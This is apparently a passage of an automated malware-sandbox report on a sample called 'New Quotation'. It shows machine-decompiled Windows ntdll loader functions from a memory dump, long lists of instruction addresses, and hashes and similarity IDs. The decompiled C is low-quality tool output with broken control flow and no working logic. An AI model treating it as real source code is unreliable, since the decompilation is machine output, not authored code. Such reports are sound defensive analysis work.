															_t343 = _t380;
															_v328 = _t343;
															_t356 = _t371;
															_v324 = _t356;
															__eflags = _t343 - _v272;
														} while (_t343 != _v272);
														__eflags = _t356 - _v380;
													} while (_t356 != _v380);
													_v352 = 3;
													_push("true");
													_push( &_v352);
													_push(9);
													_push( *((intOrPtr*)(_t377 + 0x24)));
													E1D8143A0();
												} else {
													_t288 =  *((intOrPtr*)(_t377 + 0x110));
													if(_t288 == 0) {
														_t288 =  *0x7ffe03c0;
													}
													if( *((intOrPtr*)(_t377 + 0x100)) != _t288) {
														L1D7E2330(_t288, _t377 + 0x2c);
														E1D8A4407(_t377);
														E1D7E24D0(_t377 + 0x2c);
													}
													_t292 = _t377 + 8;
													_v356 = _t292;
													_t379 =  *_t292;
													_t347 = _t292[1];
													_v320 = _t379;
													_v316 = _t347;
													while(1) {
														_t341 = _t379;
														_v360 = _t341;
														_t371 = _t347;
														_v364 = _t371;
														_t293 = _t341 & 0x0000ffff;
														_v308 = _t293;
														if( *((char*)(_t377 + 0xe4)) != 0) {
															goto L67;
														}
														if(_t371 != 0) {
															__eflags = _t293;
															if(_t293 < 0) {
																__eflags = _v261;
																if(_v261 == 0) {
																	goto L41;
																}
															}
															_v249 = 0;
															_v316 = _t371 - 1;
															L42:
															_t297 = _t341;
															_t341 = _t379;
															asm("lock cmpxchg8b [esi]");
															_t379 = _t297;
															_v320 = _t379;
															_t347 = _t371;
															_v316 = _t347;
															if(_t379 != _v360 || _t347 != _v364) {
																continue;
															} else {
																_t298 = _v249;
																_v245 = _t298;
																if(_t298 != 0) {
																	goto L8;
																}
																goto L20;
															}
														}
														L41:
														_v249 = 1;
														_t379 = (_v308 + 0x00000001 ^ _t341) & 0x0000ffff ^ _t341;
														_v320 = _t379;
														goto L42;
													}
												}
												goto L67;
											}
											__eflags = _t342 - E1D7D7290;
											if(_t342 != E1D7D7290) {
												__eflags = _t342 - E1D7D5570;
												if(_t342 != E1D7D5570) {
													 *0x1d8c91e0();
													 *_t342();
													_v8 = 2;
													goto L34;
												}
												E1D7D5570( &_v216);
												goto L33;
											}
											E1D7D7290();
											goto L33;
										}
										L20:
										_push( &_v272);
										_t371 =  &_v244;
										_t347 = _t377;
										if(E1D7D6970(_t377,  &_v244) == 0) {
											goto L67;
										}
										if((_v84 & 0x00000001) != 0) {
											E1D7CBE18( &_v216);
											_v84 = _v84 & 0xfffffffe;
										}
										_t359 = _v272;
										_v228 = _t359;
										_v168 =  *((intOrPtr*)( *_t359));
										_v164 = _t359;
										_v144 = _v220;
										_t360 =  *[fs:0x18];
										_v80 =  *((intOrPtr*)(_t360 + 0xf50));
										_v76 =  *((intOrPtr*)(_t360 + 0xf54));
										_v72 =  *((intOrPtr*)(_t360 + 0xf58));
										_v68 =  *((intOrPtr*)(_t360 + 0xf5c));
										_t309 = _v220;
										if(_t309 != 0 && ( *(_t309 + 0x10c) & 0x00000001) == 0) {
											_t372 = _v160 | 0x00000008;
											_v160 = _t372;
											_t316 =  *[fs:0x18];
											_v408 = _t316;
											if( *((intOrPtr*)(_t316 + 0xf9c)) != 0) {
												_t317 = 1;
											} else {
												_t317 = 0;
											}
											if(_t317 != 0) {
												_t372 = _t372 | 0x00000004;
												_v160 = _t372;
											}
											if(E1D7D6929() != 0) {
												_v160 = _t372;
											}
											if( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xa0)) + 0xc)) ==  *((intOrPtr*)( *[fs:0x18] + 0x24))) {
												_v160 = _v160 | 0x00000020;
											}
											_t322 =  *[fs:0x18];
											_v404 = _t322;
											if( *((intOrPtr*)(_t322 + 0xfb8)) != 0) {
												_v160 = _v160 | 0x00000040;
											}
											_t323 =  *[fs:0x18];
											_v380 = _t323;
											if( *((intOrPtr*)(_t323 + 0xf88)) != 0) {
												_v160 = _v160 | 0x00000080;
											}
										}
										_v8 = 8;
										_t361 = _v272;
										_t384 =  *((intOrPtr*)( *_t361));
										_push(_t361);
										_push( &_v216);
										if(_t384 != E1D7D6B70) {
											__eflags = _t384 - E1D7D56E0;
											if(_t384 != E1D7D56E0) {
												 *0x1d8c91e0();
												 *_t384();
											} else {
												E1D7D56E0(_t361);
											}
										} else {
											E1D7D6B70();
										}
										goto L33;
									}
								}
							}
							_t268 =  *0x7ffe03c0;
							goto L16;
						}
					}
					E1D7D7F98(_t341, _t377,  &_v244, _t377, _t379, _t394);
					_v252 = 1;
					_t379 = _v292;
					L1D7E2330(_t379 + 0x250, _t379 + 0x250);
					_v8 = 4;
					_t332 = _t379 + 0x254;
					_t368 =  *((intOrPtr*)(_t332 + 4));
					if( *_t368 != _t332) {
						asm("int 0x29");
						__eflags = _v292 + 0x250;
						return E1D7E24D0(_v292 + 0x250);
					}
					_v244 = _t332;
					_v240 = _t368;
					_t375 =  &_v244;
					 *_t368 = _t375;
					 *((intOrPtr*)(_t332 + 4)) = _t375;
					_v251 = 1;
					_v8 = 2;
					L71();
					E1D818F40( &_v216, 0, 0x98);
					_t389 = _t389 + 0xc;
					asm("lock inc dword [edi+0xf8]");
					_v250 = 1;
					_t371 =  &_v44;
					_t347 = _t377;
					E1D7D4A09(_t377,  &_v44, 0);
					goto L8;
				}
				_t339 =  *((intOrPtr*)(_t377 + 0x24));
				_v388 = _t339;
				_push(_t339);
				_t340 = E1D8129A0();
				_v276 = _t340;
				if(_t340 < 0) {
					goto L73;
				}
				asm("lock inc dword [edi]");
				_v246 = 1;
				goto L5;
			}












































































































                                                                                                                                                                                          0x1d7d58e0
                                                                                                                                                                                          0x1d7d58e0
                                                                                                                                                                                          0x1d7d58e0
                                                                                                                                                                                          0x1d7d58e5
                                                                                                                                                                                          0x1d7d58e7
                                                                                                                                                                                          0x1d7d58ec
                                                                                                                                                                                          0x1d7d58f7
                                                                                                                                                                                          0x1d7d58f8
                                                                                                                                                                                          0x1d7d58fe
                                                                                                                                                                                          0x1d7d5903
                                                                                                                                                                                          0x1d7d5906
                                                                                                                                                                                          0x1d7d5908
                                                                                                                                                                                          0x1d7d590b
                                                                                                                                                                                          0x1d7d590c
                                                                                                                                                                                          0x1d7d590d
                                                                                                                                                                                          0x1d7d590e
                                                                                                                                                                                          0x1d7d5912
                                                                                                                                                                                          0x1d7d5918
                                                                                                                                                                                          0x1d7d591b
                                                                                                                                                                                          0x1d7d591e
                                                                                                                                                                                          0x1d7d5928
                                                                                                                                                                                          0x1d7d592e
                                                                                                                                                                                          0x1d7d5935
                                                                                                                                                                                          0x1d7d593c
                                                                                                                                                                                          0x1d7d5943
                                                                                                                                                                                          0x1d7d594a
                                                                                                                                                                                          0x1d7d5951
                                                                                                                                                                                          0x1d7d5958
                                                                                                                                                                                          0x1d7d595f
                                                                                                                                                                                          0x1d7d5966
                                                                                                                                                                                          0x1d7d5970
                                                                                                                                                                                          0x1d7d597a
                                                                                                                                                                                          0x1d7d5985
                                                                                                                                                                                          0x1d7d598b
                                                                                                                                                                                          0x1d7d5998
                                                                                                                                                                                          0x1d7d599d
                                                                                                                                                                                          0x1d7d59a3
                                                                                                                                                                                          0x1d7d59a8
                                                                                                                                                                                          0x1d7d59b0
                                                                                                                                                                                          0x1d7d59b2
                                                                                                                                                                                          0x1d7d59b8
                                                                                                                                                                                          0x1d7d59b8
                                                                                                                                                                                          0x1d7d59c8
                                                                                                                                                                                          0x1d7d59cd
                                                                                                                                                                                          0x1d7d59d0
                                                                                                                                                                                          0x1d7d59d7
                                                                                                                                                                                          0x1d7d59e5
                                                                                                                                                                                          0x1d7d59ea
                                                                                                                                                                                          0x1d7d59f8
                                                                                                                                                                                          0x1d830745
                                                                                                                                                                                          0x1d83074f
                                                                                                                                                                                          0x1d83074f
                                                                                                                                                                                          0x1d830756
                                                                                                                                                                                          0x1d7d5a25
                                                                                                                                                                                          0x1d7d5a25
                                                                                                                                                                                          0x1d7d5a2c
                                                                                                                                                                                          0x1d7d5a31
                                                                                                                                                                                          0x1d7d5a38
                                                                                                                                                                                          0x1d7d5fef
                                                                                                                                                                                          0x1d7d5fef
                                                                                                                                                                                          0x1d7d5ff6
                                                                                                                                                                                          0x1d7d5ffb
                                                                                                                                                                                          0x1d7d6002
                                                                                                                                                                                          0x1d7d6007
                                                                                                                                                                                          0x1d7d6007
                                                                                                                                                                                          0x1d7d6009
                                                                                                                                                                                          0x1d7d600f
                                                                                                                                                                                          0x1d7d6017
                                                                                                                                                                                          0x1d7d601c
                                                                                                                                                                                          0x1d7d601c
                                                                                                                                                                                          0x1d7d5b95
                                                                                                                                                                                          0x1d7d5b99
                                                                                                                                                                                          0x1d7d5f2d
                                                                                                                                                                                          0x1d7d5f32
                                                                                                                                                                                          0x1d7d5f36
                                                                                                                                                                                          0x1d7d5f36
                                                                                                                                                                                          0x1d7d5ba1
                                                                                                                                                                                          0x1d7d5fcf
                                                                                                                                                                                          0x1d7d5fcf
                                                                                                                                                                                          0x1d7d5fd4
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7d5fd6
                                                                                                                                                                                          0x1d7d5fd6
                                                                                                                                                                                          0x1d7d5fd9
                                                                                                                                                                                          0x1d8307dc
                                                                                                                                                                                          0x1d8307e3
                                                                                                                                                                                          0x1d8307e5
                                                                                                                                                                                          0x1d8307ea
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d8307ea
                                                                                                                                                                                          0x1d7d5fdf
                                                                                                                                                                                          0x1d7d5fe2
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7d5fe8
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7d5ba7
                                                                                                                                                                                          0x1d7d5ba9
                                                                                                                                                                                          0x1d7d5e71
                                                                                                                                                                                          0x1d7d5e77
                                                                                                                                                                                          0x1d7d5e79
                                                                                                                                                                                          0x1d7d5bb4
                                                                                                                                                                                          0x1d7d5bba
                                                                                                                                                                                          0x1d830836
                                                                                                                                                                                          0x1d83083a
                                                                                                                                                                                          0x1d830841
                                                                                                                                                                                          0x1d830847
                                                                                                                                                                                          0x1d830847
                                                                                                                                                                                          0x1d7d5bd4
                                                                                                                                                                                          0x1d7d5bda
                                                                                                                                                                                          0x1d7d5be0
                                                                                                                                                                                          0x1d7d5be7
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7d5bed
                                                                                                                                                                                          0x1d7d5bf3
                                                                                                                                                                                          0x1d7d5ae0
                                                                                                                                                                                          0x1d7d5ae0
                                                                                                                                                                                          0x1d7d5aec
                                                                                                                                                                                          0x1d7d5aef
                                                                                                                                                                                          0x1d7d5af2
                                                                                                                                                                                          0x1d7d5af5
                                                                                                                                                                                          0x1d7d5af8
                                                                                                                                                                                          0x1d7d5afb
                                                                                                                                                                                          0x1d7d5b07
                                                                                                                                                                                          0x1d7d5f69
                                                                                                                                                                                          0x1d7d5f73
                                                                                                                                                                                          0x1d7d5f8b
                                                                                                                                                                                          0x1d7d5f90
                                                                                                                                                                                          0x1d7d5f92
                                                                                                                                                                                          0x1d83077f
                                                                                                                                                                                          0x1d83077f
                                                                                                                                                                                          0x1d830789
                                                                                                                                                                                          0x1d7d5b43
                                                                                                                                                                                          0x1d7d5b43
                                                                                                                                                                                          0x1d7d5b49
                                                                                                                                                                                          0x1d7d5b53
                                                                                                                                                                                          0x1d7d5b5a
                                                                                                                                                                                          0x1d7d5b5d
                                                                                                                                                                                          0x1d7d5b66
                                                                                                                                                                                          0x1d7d5b67
                                                                                                                                                                                          0x1d7d5b6d
                                                                                                                                                                                          0x1d7d5b6e
                                                                                                                                                                                          0x1d7d5b74
                                                                                                                                                                                          0x1d7d5b7a
                                                                                                                                                                                          0x1d7d5b7b
                                                                                                                                                                                          0x1d7d5b80
                                                                                                                                                                                          0x1d7d5b86
                                                                                                                                                                                          0x1d7d5b8f
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7d5b8f
                                                                                                                                                                                          0x1d7d5f98
                                                                                                                                                                                          0x1d7d5f98
                                                                                                                                                                                          0x1d7d5f9e
                                                                                                                                                                                          0x1d7d5fa0
                                                                                                                                                                                          0x1d7d5fa7
                                                                                                                                                                                          0x1d7d5fae
                                                                                                                                                                                          0x1d7d5fb1
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7d5fb1
                                                                                                                                                                                          0x1d7d5b13
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7d5b19
                                                                                                                                                                                          0x1d7d5b30
                                                                                                                                                                                          0x1d7d5b35
                                                                                                                                                                                          0x1d7d5b3b
                                                                                                                                                                                          0x1d7d5b41
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7d5b41
                                                                                                                                                                                          0x1d7d5bf9
                                                                                                                                                                                          0x1d7d5bfe
                                                                                                                                                                                          0x1d7d5e84
                                                                                                                                                                                          0x1d7d5e8d
                                                                                                                                                                                          0x1d7d5e93
                                                                                                                                                                                          0x1d7d5ea1
                                                                                                                                                                                          0x1d7d5ea9
                                                                                                                                                                                          0x1d7d5eb4
                                                                                                                                                                                          0x1d7d5eb9
                                                                                                                                                                                          0x1d7d5ec0
                                                                                                                                                                                          0x1d7d5ec6
                                                                                                                                                                                          0x1d7d5ec7
                                                                                                                                                                                          0x1d7d5ed0
                                                                                                                                                                                          0x1d7d5ed1
                                                                                                                                                                                          0x1d7d5ed2
                                                                                                                                                                                          0x1d7d5ed8
                                                                                                                                                                                          0x1d7d5f15
                                                                                                                                                                                          0x1d7d5d52
                                                                                                                                                                                          0x1d7d5d52
                                                                                                                                                                                          0x1d7d5d59
                                                                                                                                                                                          0x1d7d5d60
                                                                                                                                                                                          0x1d830909
                                                                                                                                                                                          0x1d830909
                                                                                                                                                                                          0x1d7d5d6d
                                                                                                                                                                                          0x1d7d5d74
                                                                                                                                                                                          0x1d7d5d81
                                                                                                                                                                                          0x1d7d5d86
                                                                                                                                                                                          0x1d7d5d8d
                                                                                                                                                                                          0x1d7d5d9e
                                                                                                                                                                                          0x1d830955
                                                                                                                                                                                          0x1d830958
                                                                                                                                                                                          0x1d83095e
                                                                                                                                                                                          0x1d830960
                                                                                                                                                                                          0x1d830963
                                                                                                                                                                                          0x1d830969
                                                                                                                                                                                          0x1d830969
                                                                                                                                                                                          0x1d83096f
                                                                                                                                                                                          0x1d83096f
                                                                                                                                                                                          0x1d83096f
                                                                                                                                                                                          0x1d83096f
                                                                                                                                                                                          0x1d830971
                                                                                                                                                                                          0x1d830977
                                                                                                                                                                                          0x1d830979
                                                                                                                                                                                          0x1d830989
                                                                                                                                                                                          0x1d830992
                                                                                                                                                                                          0x1d830998
                                                                                                                                                                                          0x1d83099c
                                                                                                                                                                                          0x1d83099e
                                                                                                                                                                                          0x1d8309a4
                                                                                                                                                                                          0x1d8309a6
                                                                                                                                                                                          0x1d8309ac
                                                                                                                                                                                          0x1d8309ac
                                                                                                                                                                                          0x1d8309b4
                                                                                                                                                                                          0x1d8309b4
                                                                                                                                                                                          0x1d8309bc
                                                                                                                                                                                          0x1d8309c6
                                                                                                                                                                                          0x1d8309ce
                                                                                                                                                                                          0x1d8309cf
                                                                                                                                                                                          0x1d8309d1
                                                                                                                                                                                          0x1d8309d4
                                                                                                                                                                                          0x1d7d5da4
                                                                                                                                                                                          0x1d7d5da4
                                                                                                                                                                                          0x1d7d5dac
                                                                                                                                                                                          0x1d7d5f0b
                                                                                                                                                                                          0x1d7d5f0b
                                                                                                                                                                                          0x1d7d5db8
                                                                                                                                                                                          0x1d8309e2
                                                                                                                                                                                          0x1d8309e9
                                                                                                                                                                                          0x1d8309ef
                                                                                                                                                                                          0x1d8309ef
                                                                                                                                                                                          0x1d7d5dbe
                                                                                                                                                                                          0x1d7d5dc1
                                                                                                                                                                                          0x1d7d5dc7
                                                                                                                                                                                          0x1d7d5dc9
                                                                                                                                                                                          0x1d7d5dcc
                                                                                                                                                                                          0x1d7d5dd2
                                                                                                                                                                                          0x1d7d5de0
                                                                                                                                                                                          0x1d7d5de0
                                                                                                                                                                                          0x1d7d5de2
                                                                                                                                                                                          0x1d7d5de8
                                                                                                                                                                                          0x1d7d5dea
                                                                                                                                                                                          0x1d7d5df0
                                                                                                                                                                                          0x1d7d5df3
                                                                                                                                                                                          0x1d7d5e00
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7d5e08
                                                                                                                                                                                          0x1d7d5eec
                                                                                                                                                                                          0x1d7d5eef
                                                                                                                                                                                          0x1d8309f9
                                                                                                                                                                                          0x1d830a00
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d830a06
                                                                                                                                                                                          0x1d7d5ef7
                                                                                                                                                                                          0x1d7d5f00
                                                                                                                                                                                          0x1d7d5e29
                                                                                                                                                                                          0x1d7d5e29
                                                                                                                                                                                          0x1d7d5e2c
                                                                                                                                                                                          0x1d7d5e34
                                                                                                                                                                                          0x1d7d5e38
                                                                                                                                                                                          0x1d7d5e3a
                                                                                                                                                                                          0x1d7d5e40
                                                                                                                                                                                          0x1d7d5e42
                                                                                                                                                                                          0x1d7d5e4e
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7d5e58
                                                                                                                                                                                          0x1d7d5e58
                                                                                                                                                                                          0x1d7d5e5e
                                                                                                                                                                                          0x1d7d5e66
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7d5e6c
                                                                                                                                                                                          0x1d7d5e4e
                                                                                                                                                                                          0x1d7d5e0e
                                                                                                                                                                                          0x1d7d5e0e
                                                                                                                                                                                          0x1d7d5e21
                                                                                                                                                                                          0x1d7d5e23
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7d5e23
                                                                                                                                                                                          0x1d7d5de0
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7d5d9e
                                                                                                                                                                                          0x1d7d5eda
                                                                                                                                                                                          0x1d7d5ee0
                                                                                                                                                                                          0x1d7d5f53
                                                                                                                                                                                          0x1d7d5f59
                                                                                                                                                                                          0x1d7d602d
                                                                                                                                                                                          0x1d7d6033
                                                                                                                                                                                          0x1d7d6035
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7d6035
                                                                                                                                                                                          0x1d7d5f5f
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7d5f5f
                                                                                                                                                                                          0x1d7d5ee2
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7d5ee2
                                                                                                                                                                                          0x1d7d5c04
                                                                                                                                                                                          0x1d7d5c0a
                                                                                                                                                                                          0x1d7d5c0b
                                                                                                                                                                                          0x1d7d5c11
                                                                                                                                                                                          0x1d7d5c1a
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7d5c24
                                                                                                                                                                                          0x1d7d6047
                                                                                                                                                                                          0x1d7d604c
                                                                                                                                                                                          0x1d7d604c
                                                                                                                                                                                          0x1d7d5c2a
                                                                                                                                                                                          0x1d7d5c30
                                                                                                                                                                                          0x1d7d5c3a
                                                                                                                                                                                          0x1d7d5c40
                                                                                                                                                                                          0x1d7d5c4c
                                                                                                                                                                                          0x1d7d5c52
                                                                                                                                                                                          0x1d7d5c5f
                                                                                                                                                                                          0x1d7d5c68
                                                                                                                                                                                          0x1d7d5c71
                                                                                                                                                                                          0x1d7d5c7a
                                                                                                                                                                                          0x1d7d5c7d
                                                                                                                                                                                          0x1d7d5c85
                                                                                                                                                                                          0x1d7d5c9e
                                                                                                                                                                                          0x1d7d5ca1
                                                                                                                                                                                          0x1d7d5ca7
                                                                                                                                                                                          0x1d7d5cad
                                                                                                                                                                                          0x1d7d5cba
                                                                                                                                                                                          0x1d83087c
                                                                                                                                                                                          0x1d7d5cc0
                                                                                                                                                                                          0x1d7d5cc0
                                                                                                                                                                                          0x1d7d5cc0
                                                                                                                                                                                          0x1d7d5cc4
                                                                                                                                                                                          0x1d830886
                                                                                                                                                                                          0x1d830889
                                                                                                                                                                                          0x1d830889
                                                                                                                                                                                          0x1d7d5cd1
                                                                                                                                                                                          0x1d830897
                                                                                                                                                                                          0x1d830897
                                                                                                                                                                                          0x1d7d5cf0
                                                                                                                                                                                          0x1d8308a2
                                                                                                                                                                                          0x1d8308a2
                                                                                                                                                                                          0x1d7d5cf6
                                                                                                                                                                                          0x1d7d5cfc
                                                                                                                                                                                          0x1d7d5d09
                                                                                                                                                                                          0x1d8308ae
                                                                                                                                                                                          0x1d8308ae
                                                                                                                                                                                          0x1d7d5d0f
                                                                                                                                                                                          0x1d7d5d15
                                                                                                                                                                                          0x1d7d5d22
                                                                                                                                                                                          0x1d8308ba
                                                                                                                                                                                          0x1d8308ba
                                                                                                                                                                                          0x1d7d5d22
                                                                                                                                                                                          0x1d7d5d28
                                                                                                                                                                                          0x1d7d5d2f
                                                                                                                                                                                          0x1d7d5d37
                                                                                                                                                                                          0x1d7d5d39
                                                                                                                                                                                          0x1d7d5d40
                                                                                                                                                                                          0x1d7d5d47
                                                                                                                                                                                          0x1d7d5f41
                                                                                                                                                                                          0x1d7d5f47
                                                                                                                                                                                          0x1d7d5fc2
                                                                                                                                                                                          0x1d7d5fc8
                                                                                                                                                                                          0x1d7d5f49
                                                                                                                                                                                          0x1d7d5f49
                                                                                                                                                                                          0x1d7d5f49
                                                                                                                                                                                          0x1d7d5d4d
                                                                                                                                                                                          0x1d7d5d4d
                                                                                                                                                                                          0x1d7d5d4d
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7d5d47
                                                                                                                                                                                          0x1d7d5be7
                                                                                                                                                                                          0x1d7d5e7f
                                                                                                                                                                                          0x1d7d5baf
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7d5baf
                                                                                                                                                                                          0x1d7d5ba1
                                                                                                                                                                                          0x1d7d5a46
                                                                                                                                                                                          0x1d7d5a4b
                                                                                                                                                                                          0x1d7d5a52
                                                                                                                                                                                          0x1d7d5a5f
                                                                                                                                                                                          0x1d7d5a64
                                                                                                                                                                                          0x1d7d5a6b
                                                                                                                                                                                          0x1d7d5a71
                                                                                                                                                                                          0x1d7d5a76
                                                                                                                                                                                          0x1d830772
                                                                                                                                                                                          0x1d7d6068
                                                                                                                                                                                          0x1d7d6073
                                                                                                                                                                                          0x1d7d6073
                                                                                                                                                                                          0x1d7d5a7c
                                                                                                                                                                                          0x1d7d5a82
                                                                                                                                                                                          0x1d7d5a88
                                                                                                                                                                                          0x1d7d5a8e
                                                                                                                                                                                          0x1d7d5a92
                                                                                                                                                                                          0x1d7d5a95
                                                                                                                                                                                          0x1d7d5a9c
                                                                                                                                                                                          0x1d7d5aa3
                                                                                                                                                                                          0x1d7d5ab6
                                                                                                                                                                                          0x1d7d5abb
                                                                                                                                                                                          0x1d7d5abe
                                                                                                                                                                                          0x1d7d5ac5
                                                                                                                                                                                          0x1d7d5ace
                                                                                                                                                                                          0x1d7d5ad1
                                                                                                                                                                                          0x1d7d5ad3
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7d5ad3
                                                                                                                                                                                          0x1d7d59fe
                                                                                                                                                                                          0x1d7d5a01
                                                                                                                                                                                          0x1d7d5a07
                                                                                                                                                                                          0x1d7d5a08
                                                                                                                                                                                          0x1d7d5a0d
                                                                                                                                                                                          0x1d7d5a15
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7d5a1b
                                                                                                                                                                                          0x1d7d5a1e
                                                                                                                                                                                          0x00000000

                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000007.00000002.49660847466.000000001D7A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D7A0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000007.00000002.49662270374.000000001D8C9000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000007.00000002.49662305343.000000001D8CD000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_1d7a0000_New Quotation.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID: @
                                                                                                                                                                                          • API String ID: 0-2766056989
                                                                                                                                                                                          • Opcode ID: adf92df4145473cb5c5d2dea7c2b4d1353950f818a64a2cdd75f2fbbb0a96f38
                                                                                                                                                                                          • Instruction ID: 8a380a75cf5a92a801d81465042b2d9ab0f5afb94a6388185ae3732ea2da5cbc
                                                                                                                                                                                          • Opcode Fuzzy Hash: adf92df4145473cb5c5d2dea7c2b4d1353950f818a64a2cdd75f2fbbb0a96f38
                                                                                                                                                                                          • Instruction Fuzzy Hash: BE32477490476ADFDB61CF64C884BEDBBB0BB09324F0081EAD54DA7251D774AA84CF92
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 1D804B79 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 164COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 50%
                                                                                                                                                                                          			E1D804B79(intOrPtr* __ecx, signed int __edx) {
				signed int _v8;
				signed int _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				signed int _v72;
				intOrPtr _v76;
				signed int _v84;
				signed int _v88;
				char _v92;
				signed int _v96;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t82;
				signed int _t86;
				signed int _t89;
				intOrPtr* _t97;
				signed int _t99;
				void* _t102;
				void* _t104;
				signed int _t111;
				intOrPtr* _t112;
				intOrPtr* _t113;
				signed int _t114;
				void* _t115;

				_t107 = __edx;
				_t72 =  *0x1d8cb370 ^ _t114;
				_v8 =  *0x1d8cb370 ^ _t114;
				_t110 = __ecx;
				_v96 = __edx;
				_t99 = __edx;
				if(__edx == 0 || ( *(__edx + 8) & 0x00000004) != 0) {
					L12:
					return E1D814B50(_t72, _t97, _v8 ^ _t114, _t107, _t110, _t111);
				} else {
					_t110 = __ecx + 4;
					_t97 =  *_t110;
					while(_t97 != _t110) {
						_t6 = _t97 - 8; // -4
						_t111 = _t6;
						_t107 = 1;
						if( *_t111 != 0x74736c46) {
							_v84 = _v84 & 0x00000000;
							_push( &_v92);
							_v76 = 4;
							_v72 = 1;
							_v68 = 1;
							_v64 = _t110;
							_v60 = _t111;
							_v92 = 0xc0150015;
							_v88 = 1;
							E1D828A60(_t99, 1);
							_t99 = _v96;
							_t107 = 1;
						}
						if( *(_t111 + 0x14) !=  !( *(_t111 + 4))) {
							_v84 = _v84 & 0x00000000;
							_push( &_v92);
							_v76 = 4;
							_v72 = _t107;
							_v68 = 2;
							_v64 = _t110;
							_v60 = _t111;
							_v92 = 0xc0150015;
							_v88 = _t107;
							E1D828A60(_t99, _t107);
							_t99 = _v96;
						}
						_t72 = _t111 + 0x18;
						if(_t99 < _t111 + 0x18) {
							L13:
							_t97 =  *_t97;
							continue;
						} else {
							_t10 = _t111 + 0x618; // 0x614
							_t72 = _t10;
							if(_t99 >= _t10) {
								goto L13;
							} else {
								_v96 = 0x30;
								_t82 = _t99 - _t111 - 0x18;
								asm("cdq");
								_t107 = _t82 % _v96;
								_t72 = 0x18 + _t82 / _v96 * 0x30 + _t111;
								if(_t99 == 0x18 + _t82 / _v96 * 0x30 + _t111) {
									_t72 =  *(_t111 + 4);
									if(_t72 != 0) {
										_t86 = _t72 - 1;
										 *(_t111 + 4) = _t86;
										_t72 =  !_t86;
										 *(_t111 + 0x14) =  !_t86;
										 *((intOrPtr*)(_t99 + 8)) = 4;
										if( *(_t111 + 4) == 0) {
											_t72 =  *(_t97 + 4);
											if(_t72 != _t110) {
												do {
													_t111 =  *(_t72 + 4);
													_t56 = _t72 - 8; // 0xfffffff6
													_t107 = _t56;
													if( *((intOrPtr*)(_t107 + 4)) != 0) {
														goto L33;
													} else {
														_t102 =  *_t72;
														if( *(_t102 + 4) != _t72 ||  *_t111 != _t72) {
															_push(3);
															asm("int 0x29");
															_t104 = 0x3f;
															if( *((intOrPtr*)(_t72 + 2)) == _t104 &&  *(_t72 + 4) == _t104 &&  *((intOrPtr*)(_t72 + 6)) == _t111 &&  *(_t72 + 8) != _t97 &&  *((short*)(_t72 + 0xa)) == 0x3a &&  *((intOrPtr*)(_t72 + 0xc)) == _t111) {
																_t72 = _t72 + 8;
															}
															_t112 =  *0x1d8c65e4; // 0x7535f0e0
															 *0x1d8c91e0(_t107, _t72,  &_v8);
															_t113 =  *_t112();
															if(_t113 >= 0) {
																L18:
																_t89 = _v8;
																if(_t89 != 0) {
																	if( *(_t110 + 0x48) != _t97) {
																		E1D7D26A0(_t89,  *(_t110 + 0x48));
																		_t89 = _v8;
																	}
																	 *(_t110 + 0x48) = _t89;
																}
																if(_t113 < 0) {
																	if(( *0x1d8c37c0 & 0x00000003) != 0) {
																		E1D84E692("minkernel\\ntdll\\ldrsnap.c", 0x2eb, "LdrpFindDllActivationContext", _t97, "Querying the active activation context failed with status 0x%08lx\n", _t113);
																	}
																	if(( *0x1d8c37c0 & 0x00000010) != 0) {
																		asm("int3");
																	}
																}
																return _t113;
															} else {
																if(_t113 != 0xc000008a) {
																	if(_t113 == 0xc000008b || _t113 == 0xc0000089 || _t113 == 0xc000000f || _t113 == 0xc0000204 || _t113 == 0xc0000002) {
																		goto L16;
																	} else {
																		if(_t113 != 0xc00000bb) {
																			goto L18;
																		} else {
																			goto L16;
																		}
